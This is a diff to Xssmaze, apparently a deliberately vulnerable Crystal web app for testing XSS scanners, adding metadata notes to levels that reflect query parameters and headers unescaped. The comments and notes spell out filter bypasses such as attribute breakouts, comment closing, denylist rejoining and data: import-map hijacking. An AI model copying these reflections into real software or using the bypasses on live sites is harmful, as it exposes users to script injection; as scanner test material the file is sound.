 # Break out of data attribute with "
-Xssmaze.push("embedctx-level1", "/embedctx/level1/?query=a", "reflection in object data attribute")
+Xssmaze.push("embedctx-level1", "/embedctx/level1/?query=a", "reflection in object data attribute",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/embedctx/level1/" do |env|
   query = env.params.query["query"]
 
@@ -12,7 +13,8 @@ end
 
 # Level 2: Reflected in <embed type="text/html" src="QUERY">
 # Break out of src attribute with "
-Xssmaze.push("embedctx-level2", "/embedctx/level2/?query=a", "reflection in embed src attribute with text/html type")
+Xssmaze.push("embedctx-level2", "/embedctx/level2/?query=a", "reflection in embed src attribute with text/html type",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/embedctx/level2/" do |env|
   query = env.params.query["query"]
 
@@ -24,7 +26,8 @@ end
 
 # Level 3: Reflected in <param name="movie" value="QUERY"> inside <object>
 # Break out of value attribute with "
-Xssmaze.push("embedctx-level3", "/embedctx/level3/?query=a", "reflection in param value inside object tag")
+Xssmaze.push("embedctx-level3", "/embedctx/level3/?query=a", "reflection in param value inside object tag",
+  vuln: "reflected-attr", delivery: ["query"], note: "reflected into a <param value> nested inside <object>")
 maze_get "/embedctx/level3/" do |env|
   query = env.params.query["query"]
 
@@ -39,7 +42,8 @@ end
 
 # Level 4: Reflected in <applet code="QUERY"> (deprecated but parsed)
 # Break out of code attribute with "
-Xssmaze.push("embedctx-level4", "/embedctx/level4/?query=a", "reflection in deprecated applet code attribute")
+Xssmaze.push("embedctx-level4", "/embedctx/level4/?query=a", "reflection in deprecated applet code attribute",
+  vuln: "reflected-attr", delivery: ["query"], note: "<applet> is not a recognised element in modern parsers, but its start tag still tokenises, so the attribute breakout works")
 maze_get "/embedctx/level4/" do |env|
   query = env.params.query["query"]
 
@@ -51,7 +55,8 @@ end
 
 # Level 5: Reflected in <param name="src" value="QUERY"> inside nested <object>
 # Break out of value attribute with "
-Xssmaze.push("embedctx-level5", "/embedctx/level5/?query=a", "reflection in param value inside nested object")
+Xssmaze.push("embedctx-level5", "/embedctx/level5/?query=a", "reflection in param value inside nested object",
+  vuln: "reflected-attr", delivery: ["query"], note: "reflected into a <param value> nested inside <object>")
 maze_get "/embedctx/level5/" do |env|
   query = env.params.query["query"]
 
@@ -66,7 +71,8 @@ end
 
 # Level 6: Reflected in <embed src="QUERY"> with explicit dimensions
 # Break out of src attribute with "
-Xssmaze.push("embedctx-level6", "/embedctx/level6/?query=a", "reflection in embed src with dimensions")
+Xssmaze.push("embedctx-level6", "/embedctx/level6/?query=a", "reflection in embed src with dimensions",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/embedctx/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/error_page_xss.cr
+++ b/src/mazes/error_page_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: 404-like error page with raw reflection in heading
-Xssmaze.push("errpage-level1", "/errpage/level1/?query=a", "404 error page with raw reflection in h1")
+Xssmaze.push("errpage-level1", "/errpage/level1/?query=a", "404 error page with raw reflection in h1",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/errpage/level1/" do |env|
   query = env.params.query["query"]
 
@@ -7,7 +8,8 @@ maze_get "/errpage/level1/" do |env|
 end
 
 # Level 2: Error message with raw reflection in div
-Xssmaze.push("errpage-level2", "/errpage/level2/?query=a", "error message div with raw reflection")
+Xssmaze.push("errpage-level2", "/errpage/level2/?query=a", "error message div with raw reflection",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/errpage/level2/" do |env|
   query = env.params.query["query"]
 
@@ -16,7 +18,8 @@ end
 
 # Level 3: Debug page with query reflected in <pre> block
 # Break out of pre and inject
-Xssmaze.push("errpage-level3", "/errpage/level3/?query=a", "debug page with reflection in pre tag")
+Xssmaze.push("errpage-level3", "/errpage/level3/?query=a", "debug page with reflection in pre tag",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/errpage/level3/" do |env|
   query = env.params.query["query"]
 
@@ -25,7 +28,8 @@ end
 
 # Level 4: Search results page with query in paragraph text
 # Break out of quoted text and inject HTML
-Xssmaze.push("errpage-level4", "/errpage/level4/?query=a", "search results page with reflection in paragraph")
+Xssmaze.push("errpage-level4", "/errpage/level4/?query=a", "search results page with reflection in paragraph",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/errpage/level4/" do |env|
   query = env.params.query["query"]
 
@@ -34,7 +38,8 @@ end
 
 # Level 5: Error page with query in both <title> and <h1>
 # Both contexts are exploitable
-Xssmaze.push("errpage-level5", "/errpage/level5/?query=a", "error page with reflection in title and h1")
+Xssmaze.push("errpage-level5", "/errpage/level5/?query=a", "error page with reflection in title and h1",
+  vuln: "reflected-html", delivery: ["query"], note: "reflected into both <title> RCDATA and the <h1> body")
 maze_get "/errpage/level5/" do |env|
   query = env.params.query["query"]
 
@@ -43,7 +48,8 @@ end
 
 # Level 6: Stack trace page with query reflected in <code> block
 # Break out of code tag and inject
-Xssmaze.push("errpage-level6", "/errpage/level6/?query=a", "stack trace page with reflection in code tag")
+Xssmaze.push("errpage-level6", "/errpage/level6/?query=a", "stack trace page with reflection in code tag",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/errpage/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/event_handler.cr
+++ b/src/mazes/event_handler.cr
@@ -21,31 +21,36 @@ module EventHandlerHelper
   end
 end
 
-Xssmaze.push("eventhandler-xss-level1", "/eventhandler/level1/?query=a", "eventhandler-xss (basic)")
+Xssmaze.push("eventhandler-xss-level1", "/eventhandler/level1/?query=a", "eventhandler-xss (basic)",
+  vuln: "reflected-attr", delivery: ["query"], note: "angle brackets are stripped, so no tag can be opened; the payload has to be a bare attribute injected into the wrapper <div ...>, e.g. onmouseover=alert(1), and needs its event to fire")
 maze_get "/eventhandler/level1/" do |env|
   query = env.params.query["query"]
   EventHandlerHelper.build_html(query)
 end
 
-Xssmaze.push("eventhandler-xss-level2", "/eventhandler/level2/?query=a", "eventhandler-xss (level 2)")
+Xssmaze.push("eventhandler-xss-level2", "/eventhandler/level2/?query=a", "eventhandler-xss (level 2)",
+  vuln: "reflected-attr", delivery: ["query"], note: "as level 1, and onerror/onload/onclick are removed by name; other handlers survive")
 maze_get "/eventhandler/level2/" do |env|
   query = EventHandlerHelper.sanitize(env.params.query["query"], 2)
   EventHandlerHelper.build_html(query)
 end
 
-Xssmaze.push("eventhandler-xss-level3", "/eventhandler/level3/?query=a", "eventhandler-xss (level 3)")
+Xssmaze.push("eventhandler-xss-level3", "/eventhandler/level3/?query=a", "eventhandler-xss (level 3)",
+  vuln: "reflected-attr", delivery: ["query"], note: "as level 1, and seven handler names are removed; unlisted ones such as ondblclick survive")
 maze_get "/eventhandler/level3/" do |env|
   query = EventHandlerHelper.sanitize(env.params.query["query"], 3)
   EventHandlerHelper.build_html(query)
 end
 
-Xssmaze.push("eventhandler-xss-level4", "/eventhandler/level4/?query=a", "eventhandler-xss (level 4)")
+Xssmaze.push("eventhandler-xss-level4", "/eventhandler/level4/?query=a", "eventhandler-xss (level 4)",
+  vuln: "reflected-attr", delivery: ["query"], note: "as level 1, and animation/drag handlers plus javascript: are removed; ontoggle and onpointerover survive")
 maze_get "/eventhandler/level4/" do |env|
   query = EventHandlerHelper.sanitize(env.params.query["query"], 4)
   EventHandlerHelper.build_html(query)
 end
 
-Xssmaze.push("eventhandler-xss-level5", "/eventhandler/level5/?query=a", "eventhandler-xss (level 5)")
+Xssmaze.push("eventhandler-xss-level5", "/eventhandler/level5/?query=a", "eventhandler-xss (level 5)",
+  vuln: "reflected-attr", delivery: ["query"], note: "as level 1, with a long handler denylist stripped in a single pass, so ononclickclick= rejoins into onclick=")
 maze_get "/eventhandler/level5/" do |env|
   query = EventHandlerHelper.sanitize(env.params.query["query"], 5)
   EventHandlerHelper.build_html(query)

--- a/src/mazes/header.cr
+++ b/src/mazes/header.cr
@@ -1,19 +1,23 @@
-Xssmaze.push("header-level1", "/header/level1/", "referer header", "GET", ["Referer"])
+Xssmaze.push("header-level1", "/header/level1/", "referer header", "GET", ["Referer"],
+  vuln: "reflected-html", delivery: ["referer"], note: "the whole Referer header is echoed as the entire text/html response body")
 maze_get "/header/level1/" do |env|
   env.request.headers["Referer"]? || ""
 end
 
-Xssmaze.push("header-level2", "/header/level2/", "user-agent header", "GET", ["User-Agent"])
+Xssmaze.push("header-level2", "/header/level2/", "user-agent header", "GET", ["User-Agent"],
+  vuln: "reflected-html", delivery: ["header"])
 maze_get "/header/level2/" do |env|
   env.request.headers["User-Agent"]? || ""
 end
 
-Xssmaze.push("header-level3", "/header/level3/", "authorization header", "GET", ["Authorization"])
+Xssmaze.push("header-level3", "/header/level3/", "authorization header", "GET", ["Authorization"],
+  vuln: "reflected-html", delivery: ["header"])
 maze_get "/header/level3/" do |env|
   env.request.headers["Authorization"]? || ""
 end
 
-Xssmaze.push("header-level4", "/header/level4/", "cookie header", "GET", ["Cookie"])
+Xssmaze.push("header-level4", "/header/level4/", "cookie header", "GET", ["Cookie"],
+  vuln: "reflected-html", delivery: ["cookie"], note: "the raw Cookie request header is echoed verbatim, so the payload does not have to be a valid cookie pair")
 maze_get "/header/level4/" do |env|
   env.request.headers["Cookie"]? || ""
 end

--- a/src/mazes/header_injection_xss.cr
+++ b/src/mazes/header_injection_xss.cr
@@ -1,7 +1,8 @@
 # Level 1: Referer header reflected raw in page body
 # Bypass: set Referer header to XSS payload
 # e.g. Referer: <script>alert(1)</script>
-Xssmaze.push("headerinj-level1", "/headerinj/level1/", "referer header reflected raw in body", "GET", ["Referer"])
+Xssmaze.push("headerinj-level1", "/headerinj/level1/", "referer header reflected raw in body", "GET", ["Referer"],
+  vuln: "reflected-html", delivery: ["referer"])
 maze_get "/headerinj/level1/" do |env|
   referer = env.request.headers["Referer"]? || ""
 
@@ -11,7 +12,8 @@ end
 # Level 2: User-Agent header reflected raw in page body
 # Bypass: set User-Agent header to XSS payload
 # e.g. User-Agent: <script>alert(1)</script>
-Xssmaze.push("headerinj-level2", "/headerinj/level2/", "user-agent header reflected raw in body", "GET", ["User-Agent"])
+Xssmaze.push("headerinj-level2", "/headerinj/level2/", "user-agent header reflected raw in body", "GET", ["User-Agent"],
+  vuln: "reflected-html", delivery: ["header"])
 maze_get "/headerinj/level2/" do |env|
   ua = env.request.headers["User-Agent"]? || ""
 
@@ -21,7 +23,8 @@ end
 # Level 3: X-Forwarded-For header reflected inside an HTML comment
 # Bypass: close the comment with --> then inject HTML
 # e.g. X-Forwarded-For: --><script>alert(1)</script><!--
-Xssmaze.push("headerinj-level3", "/headerinj/level3/", "x-forwarded-for reflected in HTML comment", "GET", ["X-Forwarded-For"])
+Xssmaze.push("headerinj-level3", "/headerinj/level3/", "x-forwarded-for reflected in HTML comment", "GET", ["X-Forwarded-For"],
+  vuln: "reflected-html", delivery: ["header"], note: "lands inside an HTML comment; close it with --> first")
 maze_get "/headerinj/level3/" do |env|
   xff = env.request.headers["X-Forwarded-For"]? || ""
 
@@ -31,7 +34,8 @@ end
 # Level 4: Raw Cookie header reflected in page body
 # Bypass: set Cookie header to XSS payload
 # e.g. Cookie: <script>alert(1)</script>
-Xssmaze.push("headerinj-level4", "/headerinj/level4/", "raw cookie header reflected in body", "GET", ["Cookie"])
+Xssmaze.push("headerinj-level4", "/headerinj/level4/", "raw cookie header reflected in body", "GET", ["Cookie"],
+  vuln: "reflected-html", delivery: ["cookie"], note: "the raw Cookie header is echoed, so the payload need not be a valid cookie pair")
 maze_get "/headerinj/level4/" do |env|
   cookie_raw = env.request.headers["Cookie"]? || ""
 
@@ -41,7 +45,8 @@ end
 # Level 5: Accept-Language header reflected in a <span lang="QUERY"> attribute
 # Bypass: break out of attribute with "> then inject HTML
 # e.g. Accept-Language: "><script>alert(1)</script>
-Xssmaze.push("headerinj-level5", "/headerinj/level5/", "accept-language reflected in lang attribute", "GET", ["Accept-Language"])
+Xssmaze.push("headerinj-level5", "/headerinj/level5/", "accept-language reflected in lang attribute", "GET", ["Accept-Language"],
+  vuln: "reflected-attr", delivery: ["header"])
 maze_get "/headerinj/level5/" do |env|
   lang = env.request.headers["Accept-Language"]? || "en"
 
@@ -51,7 +56,8 @@ end
 # Level 6: Custom X-Debug header reflected raw when query param debug=1 is also set
 # Bypass: set X-Debug header to XSS payload and add ?debug=1 query param
 # e.g. X-Debug: <script>alert(1)</script> with ?debug=1
-Xssmaze.push("headerinj-level6", "/headerinj/level6/?debug=1", "x-debug header reflected when debug=1 param set", "GET", ["X-Debug"])
+Xssmaze.push("headerinj-level6", "/headerinj/level6/?debug=1", "x-debug header reflected when debug=1 param set", "GET", ["X-Debug", "debug"],
+  vuln: "reflected-html", delivery: ["header"], note: "the header is only reflected when the query string also carries debug=1")
 maze_get "/headerinj/level6/" do |env|
   debug = env.params.query["debug"]? || ""
   x_debug = env.request.headers["X-Debug"]? || ""

--- a/src/mazes/import_map_xss.cr
+++ b/src/mazes/import_map_xss.cr
@@ -1,4 +1,5 @@
-Xssmaze.push("import-map-level1", "/import-map/level1/?query=a", "import map injection via script type=importmap with dynamic import().then()")
+Xssmaze.push("import-map-level1", "/import-map/level1/?query=a", "import map injection via script type=importmap with dynamic import().then()",
+  vuln: "dom", sources: ["server-reflected"], sinks: ["dynamic-import"], delivery: ["query"], note: "the value becomes the import-map address for the specifier the page then import()s, so a data:text/javascript,... address executes with no breakout; a </script> breakout out of the importmap block also reaches plain HTML")
 maze_get "/import-map/level1/" do |env|
   query = env.params.query["query"]
 
@@ -23,7 +24,8 @@ maze_get "/import-map/level1/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("import-map-level2", "/import-map/level2/?query=a", "import map injection in single-quoted context with module hijacking")
+Xssmaze.push("import-map-level2", "/import-map/level2/?query=a", "import map injection in single-quoted context with module hijacking",
+  vuln: "reflected-js", delivery: ["query"], note: "the value lands in a single-quoted JS string before it ever reaches the import map, so the breakout happens first")
 maze_get "/import-map/level2/" do |env|
   query = env.params.query["query"]
 
@@ -58,7 +60,8 @@ maze_get "/import-map/level2/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("import-map-level3", "/import-map/level3/?query=a", "import map with double-quoted JSON property and data: URL hijacking")
+Xssmaze.push("import-map-level3", "/import-map/level3/?query=a", "import map with double-quoted JSON property and data: URL hijacking",
+  vuln: "dom", sources: ["server-reflected"], sinks: ["dynamic-import"], delivery: ["query"], note: "the value becomes the import-map address for the specifier the page then import()s, so a data:text/javascript,... address executes with no breakout; a </script> breakout out of the importmap block also reaches plain HTML")
 maze_get "/import-map/level3/" do |env|
   query = env.params.query["query"]
 
@@ -83,7 +86,8 @@ maze_get "/import-map/level3/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("import-map-level4", "/import-map/level4/?query=a", "import map module overwrite with attacker-controlled domain")
+Xssmaze.push("import-map-level4", "/import-map/level4/?query=a", "import map module overwrite with attacker-controlled domain",
+  vuln: "dom", sources: ["server-reflected"], sinks: ["dynamic-import"], delivery: ["query"], note: "the value becomes the import-map address for the specifier the page then import()s, so a data:text/javascript,... address executes with no breakout; a </script> breakout out of the importmap block also reaches plain HTML")
 maze_get "/import-map/level4/" do |env|
   query = env.params.query["query"]
 
@@ -110,7 +114,8 @@ maze_get "/import-map/level4/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("import-map-level5", "/import-map/level5/?query=a", "scoped import map with bare module specifier hijacking")
+Xssmaze.push("import-map-level5", "/import-map/level5/?query=a", "scoped import map with bare module specifier hijacking",
+  vuln: "dom", sources: ["server-reflected"], sinks: ["dynamic-import"], delivery: ["query"], note: "the value becomes the import-map address for the specifier the page then import()s, so a data:text/javascript,... address executes with no breakout; a </script> breakout out of the importmap block also reaches plain HTML")
 maze_get "/import-map/level5/" do |env|
   query = env.params.query["query"]
 
@@ -139,7 +144,8 @@ maze_get "/import-map/level5/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("import-map-level6", "/import-map/level6/?query=a", "import map with trailing slash scope and path manipulation")
+Xssmaze.push("import-map-level6", "/import-map/level6/?query=a", "import map with trailing slash scope and path manipulation",
+  vuln: "reflected-html", delivery: ["query"], note: "the injected address sits under the import-map scope /app/, which never matches this page's own URL, so import() never resolves to it; the only working route is a </script> breakout out of the importmap block")
 maze_get "/import-map/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/input_transform_xss.cr
+++ b/src/mazes/input_transform_xss.cr
@@ -1,6 +1,7 @@
 # Level 1: Server prepends "User: " to query and reflects
 # Standard injection — the prefix does not interfere
-Xssmaze.push("inputtransform-level1", "/inputtransform/level1/?query=a", "server prepends prefix before reflection")
+Xssmaze.push("inputtransform-level1", "/inputtransform/level1/?query=a", "server prepends prefix before reflection",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/inputtransform/level1/" do |env|
   query = env.params.query["query"]
 
@@ -9,7 +10,8 @@ end
 
 # Level 2: Server wraps query in <b>QUERY</b>
 # Standard injection — can inject inside or break out of <b>
-Xssmaze.push("inputtransform-level2", "/inputtransform/level2/?query=a", "server wraps query in bold tags")
+Xssmaze.push("inputtransform-level2", "/inputtransform/level2/?query=a", "server wraps query in bold tags",
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/inputtransform/level2/" do |env|
   query = env.params.query["query"]
 
@@ -18,7 +20,8 @@ end
 
 # Level 3: Server truncates at first space, then reflects
 # Bypass: use no-space payloads like <svg/onload=alert(1)>
-Xssmaze.push("inputtransform-level3", "/inputtransform/level3/?query=a", "truncate at first space")
+Xssmaze.push("inputtransform-level3", "/inputtransform/level3/?query=a", "truncate at first space",
+  vuln: "reflected-html", delivery: ["query"], note: "everything from the first space onwards is dropped, so use a space-free payload such as <svg/onload=alert(1)>")
 maze_get "/inputtransform/level3/" do |env|
   query = env.params.query["query"]
   query = query.split(" ", 2).first
@@ -28,7 +31,8 @@ end
 
 # Level 4: Server splits on & and reflects only the first segment
 # Standard injection in the first segment before any &
-Xssmaze.push("inputtransform-level4", "/inputtransform/level4/?query=a", "split on ampersand, reflect first part")
+Xssmaze.push("inputtransform-level4", "/inputtransform/level4/?query=a", "split on ampersand, reflect first part",
+  vuln: "reflected-html", delivery: ["query"], note: "only the part before the first & is reflected, and the & has to be percent-encoded to reach the handler at all")
 maze_get "/inputtransform/level4/" do |env|
   query = env.params.query["query"]
   query = query.split("&", 2).first
@@ -39,7 +43,8 @@ end
 # Level 5: Server reverses the string then reflects it (unusable)
 # BUT also reflects the original unreversed query in an HTML comment
 # Bypass: break out of the comment with -->
-Xssmaze.push("inputtransform-level5", "/inputtransform/level5/?query=a", "reversed reflection + original in HTML comment")
+Xssmaze.push("inputtransform-level5", "/inputtransform/level5/?query=a", "reversed reflection + original in HTML comment",
+  vuln: "reflected-html", delivery: ["query"], note: "the visible <div> copy is character-reversed and unusable; the original lands in an HTML comment, so close it with -->")
 maze_get "/inputtransform/level5/" do |env|
   query = env.params.query["query"]
   reversed = query.reverse
@@ -49,7 +54,8 @@ end
 
 # Level 6: Server converts query to lowercase then reflects
 # HTML is case-insensitive — lowercase payloads like <script>alert(1)</script> work
-Xssmaze.push("inputtransform-level6", "/inputtransform/level6/?query=a", "lowercase conversion before reflection")
+Xssmaze.push("inputtransform-level6", "/inputtransform/level6/?query=a", "lowercase conversion before reflection",
+  vuln: "reflected-html", delivery: ["query"], note: "the value is lowercased, but HTML tag and attribute names are case-insensitive, so lowercase payloads still work")
 maze_get "/inputtransform/level6/" do |env|
   query = env.params.query["query"].downcase
 

--- a/src/mazes/jf_xss.cr
+++ b/src/mazes/jf_xss.cr
@@ -1,4 +1,5 @@
-Xssmaze.push("jf-xss-level1", "/jf/level1/?query=a", "escape a-Z")
+Xssmaze.push("jf-xss-level1", "/jf/level1/?query=a", "escape a-Z",
+  vuln: "reflected-js", delivery: ["query"], note: "every ASCII letter is stripped and the value lands as a bare statement inside <script>, so the payload has to be letter-free JavaScript (JSFuck-style []()!+)")
 maze_get "/jf/level1/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/json_xss.cr
+++ b/src/mazes/json_xss.cr
@@ -1,4 +1,5 @@
-Xssmaze.push("json-xss-level1", "/json/level1/?query=a", "JSON response XSS (JSONP)")
+Xssmaze.push("json-xss-level1", "/json/level1/?query=a", "JSON response XSS (JSONP)", "GET", ["query", "callback"],
+  vuln: "reflected-js", delivery: ["query"], note: "JSONP served as application/javascript: both query (inside a JS string) and the unfiltered callback name are reflected, but the response only executes when it is loaded as a <script> — browsing to the URL renders nothing")
 maze_get "/json/level1/" do |env|
   query = env.params.query["query"]
   callback = env.params.query["callback"]? || "callback"
@@ -7,7 +8,8 @@ maze_get "/json/level1/" do |env|
   "#{callback}({\"message\": \"#{query}\", \"status\": \"success\"})"
 end
 
-Xssmaze.push("json-xss-level2", "/json/level2/?query=a", "JSON XSS with HTML entities bypass")
+Xssmaze.push("json-xss-level2", "/json/level2/?query=a", "JSON XSS with HTML entities bypass",
+  vuln: "non-xss-control", delivery: ["query"], exploitable: false, note: "the payload is reflected raw, but the response is served as application/json, which no modern browser parses as HTML, so the markup never executes; reporting no XSS here is the correct result")
 maze_get "/json/level2/" do |env|
   query = env.params.query["query"]
   env.response.content_type = "application/json"
@@ -15,7 +17,8 @@ maze_get "/json/level2/" do |env|
   "{\"html_content\": \"<div>#{query}</div>\", \"escaped\": false}"
 end
 
-Xssmaze.push("json-xss-level3", "/json/level3/?query=a", "JSON XSS with Unicode escape")
+Xssmaze.push("json-xss-level3", "/json/level3/?query=a", "JSON XSS with Unicode escape",
+  vuln: "non-xss-control", delivery: ["query"], exploitable: false, note: "served as application/json, and quotes and backslashes are escaped, so the value cannot even break out of its JSON string")
 maze_get "/json/level3/" do |env|
   query = env.params.query["query"]
   env.response.content_type = "application/json"
@@ -25,7 +28,8 @@ maze_get "/json/level3/" do |env|
   "{\"data\": \"#{unicode_query}\", \"type\": \"unicode\"}"
 end
 
-Xssmaze.push("json-xss-level4", "/json/level4/?query=a", "JSON XSS in script tag context")
+Xssmaze.push("json-xss-level4", "/json/level4/?query=a", "JSON XSS in script tag context",
+  vuln: "reflected-js", delivery: ["query"], note: "the value lands in a double-quoted JS string; that same string is later written with innerHTML, so a tag payload also fires without a breakout")
 maze_get "/json/level4/" do |env|
   query = env.params.query["query"]
 
@@ -38,7 +42,8 @@ maze_get "/json/level4/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("json-xss-level5", "/json/level5/?query=a", "JSON XSS with array injection")
+Xssmaze.push("json-xss-level5", "/json/level5/?query=a", "JSON XSS with array injection",
+  vuln: "reflected-js", delivery: ["query"], note: "the value lands in a JS array string literal that is then passed to document.write")
 maze_get "/json/level5/" do |env|
   query = env.params.query["query"]
 
@@ -53,7 +58,8 @@ maze_get "/json/level5/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("json-xss-level6", "/json/level6/?query=a", "JSON XSS with nested object injection")
+Xssmaze.push("json-xss-level6", "/json/level6/?query=a", "JSON XSS with nested object injection",
+  vuln: "reflected-js", delivery: ["query"], note: "the value lands in a nested JS object literal string that is later written with innerHTML")
 maze_get "/json/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/markdown_render_xss.cr
+++ b/src/mazes/markdown_render_xss.cr
@@ -12,7 +12,8 @@
 # Level 1: javascript: scheme inside a markdown link
 # CVE shape: marked CVE-2017-1000427, markdown-it #167 lineage.
 # User supplies just the URL; server builds [text](url) and renders.
-Xssmaze.push("markdown-level1", "/markdown/level1/?url=https://example.com", "markdown link href: no scheme check", "GET", ["url"])
+Xssmaze.push("markdown-level1", "/markdown/level1/?url=https://example.com", "markdown link href: no scheme check", "GET", ["url"],
+  vuln: "reflected-attr", delivery: ["query"], note: "the URL slot is unescaped, so \" breaks out of the href; a ) or a space in the value instead ends the markdown link early and drops the remainder into the HTML body raw")
 maze_get "/markdown/level1/" do |env|
   url = env.params.query.fetch("url", "#")
   md = "[click here](#{url})"
@@ -25,7 +26,8 @@ end
 
 # Level 2: javascript: scheme inside a markdown image
 # showdown <1.9, older marked. Server builds ![alt](src).
-Xssmaze.push("markdown-level2", "/markdown/level2/?src=/img/cat.png", "markdown image src: no scheme check", "GET", ["src"])
+Xssmaze.push("markdown-level2", "/markdown/level2/?src=/img/cat.png", "markdown image src: no scheme check", "GET", ["src"],
+  vuln: "reflected-attr", delivery: ["query"], note: "the src slot is unescaped, so \" breaks out of the img src; a ) or a space in the value instead drops the remainder into the HTML body raw")
 maze_get "/markdown/level2/" do |env|
   src = env.params.query.fetch("src", "/img/default.png")
   md = "![profile photo](#{src})"
@@ -39,7 +41,8 @@ end
 # Level 3: HTML pass-through (raw HTML allowed in markdown)
 # markdown-it `html: true`, GitLab banzai, Discourse cooked output.
 # Scanner detects directly — `<script>` survives the renderer.
-Xssmaze.push("markdown-level3", "/markdown/level3/?query=hello", "markdown html:true pass-through (raw HTML survives)")
+Xssmaze.push("markdown-level3", "/markdown/level3/?query=hello", "markdown html:true pass-through (raw HTML survives)",
+  vuln: "reflected-html", delivery: ["query"], note: "raw HTML passes straight through the renderer")
 maze_get "/markdown/level3/" do |env|
   query = env.params.query["query"]
   html = query.gsub(/\*\*([^*]+)\*\*/) { "<strong>#{$1}</strong>" }
@@ -53,7 +56,8 @@ end
 # Older markdown autolinkers accept any URI inside <...> and emit
 # <a href="...">. CommonMark whitelists schemes; the buggy ones
 # don't. Scanner gets the URL slot directly.
-Xssmaze.push("markdown-level4", "/markdown/level4/?url=https://example.com", "markdown autolink with no scheme whitelist", "GET", ["url"])
+Xssmaze.push("markdown-level4", "/markdown/level4/?url=https://example.com", "markdown autolink with no scheme whitelist", "GET", ["url"],
+  vuln: "reflected-html", delivery: ["query"], note: "a value with no scheme: prefix fails the autolink regex, so the <value> wrapper is emitted into the body unchanged and any tag payload lands in an HTML context")
 maze_get "/markdown/level4/" do |env|
   url = env.params.query.fetch("url", "https://example.com")
   md = "<#{url}>"
@@ -69,7 +73,8 @@ end
 # Reference defs are resolved in a second pass; single-pass href
 # filters miss them. Real shape: CMS where a user pastes a body
 # containing `[label][1]` and the URL is collected separately.
-Xssmaze.push("markdown-level5", "/markdown/level5/?ref_url=https://example.com", "markdown reference-style link url (deferred resolution)", "GET", ["ref_url"])
+Xssmaze.push("markdown-level5", "/markdown/level5/?ref_url=https://example.com", "markdown reference-style link url (deferred resolution)", "GET", ["ref_url"],
+  vuln: "reflected-attr", delivery: ["query"], note: "the reference definition's URL is unescaped, so \" breaks out of the href; whitespace in the value leaves the raw [1]: line in the body instead")
 maze_get "/markdown/level5/" do |env|
   ref_url = env.params.query.fetch("ref_url", "https://example.com")
   md = "[click here][1]\n\n[1]: #{ref_url}"
@@ -91,7 +96,8 @@ end
 # Renderers that build `<img title="...">` from the markdown title
 # field without escaping allow attribute-quote breakout. Scanner
 # gets the title slot directly.
-Xssmaze.push("markdown-level6", "/markdown/level6/?title=friendly+cat", "markdown image title attribute unescaped", "GET", ["title"])
+Xssmaze.push("markdown-level6", "/markdown/level6/?title=friendly+cat", "markdown image title attribute unescaped", "GET", ["title"],
+  vuln: "reflected-html", delivery: ["query"], note: "a \" in the title makes the image regex fail to match, so the whole raw markdown line is emitted into the HTML body — the title attribute itself can never be broken out of")
 maze_get "/markdown/level6/" do |env|
   title = env.params.query.fetch("title", "")
   md = %(![alt](/img/cat.png "#{title}"))

--- a/src/mazes/mixed_method_xss.cr
+++ b/src/mazes/mixed_method_xss.cr
@@ -1,6 +1,7 @@
 # Level 1: GET param 'query' reflected raw — standard baseline
 # Bypass: <script>alert(1)</script>
-Xssmaze.push("mixedmethod-level1", "/mixed-method/level1/?query=a", "GET param query reflected raw (also works via query string on POST)")
+Xssmaze.push("mixedmethod-level1", "/mixed-method/level1/?query=a", "GET param query reflected raw (also works via query string on POST)",
+  vuln: "reflected-html", delivery: ["query"], note: "the route also answers POST, but the parameter is read from the query string either way")
 maze_get "/mixed-method/level1/" do |env|
   query = env.params.query["query"]
 
@@ -14,7 +15,8 @@ end
 
 # Level 2: Param name is 'input' (not 'query') reflected raw
 # Bypass: <script>alert(1)</script>
-Xssmaze.push("mixedmethod-level2", "/mixed-method/level2/?input=a", "GET param 'input' reflected raw (non-standard param name)", "GET", ["input"])
+Xssmaze.push("mixedmethod-level2", "/mixed-method/level2/?input=a", "GET param 'input' reflected raw (non-standard param name)", "GET", ["input"],
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/mixed-method/level2/" do |env|
   query = env.params.query["input"]
 
@@ -23,7 +25,8 @@ end
 
 # Level 3: Param name is 'search' reflected in <h2>Results for: SEARCH</h2>
 # Bypass: </h2><script>alert(1)</script>
-Xssmaze.push("mixedmethod-level3", "/mixed-method/level3/?search=a", "GET param 'search' reflected in h2 heading", "GET", ["search"])
+Xssmaze.push("mixedmethod-level3", "/mixed-method/level3/?search=a", "GET param 'search' reflected in h2 heading", "GET", ["search"],
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/mixed-method/level3/" do |env|
   query = env.params.query["search"]
 
@@ -32,7 +35,8 @@ end
 
 # Level 4: Param name is 'q' (short) reflected raw
 # Bypass: <script>alert(1)</script>
-Xssmaze.push("mixedmethod-level4", "/mixed-method/level4/?q=a", "GET param 'q' reflected raw (short param name)", "GET", ["q"])
+Xssmaze.push("mixedmethod-level4", "/mixed-method/level4/?q=a", "GET param 'q' reflected raw (short param name)", "GET", ["q"],
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/mixed-method/level4/" do |env|
   query = env.params.query["q"]
 
@@ -41,7 +45,8 @@ end
 
 # Level 5: Param name is 'callback' reflected raw — JSONP-style param discovery
 # Bypass: <script>alert(1)</script>
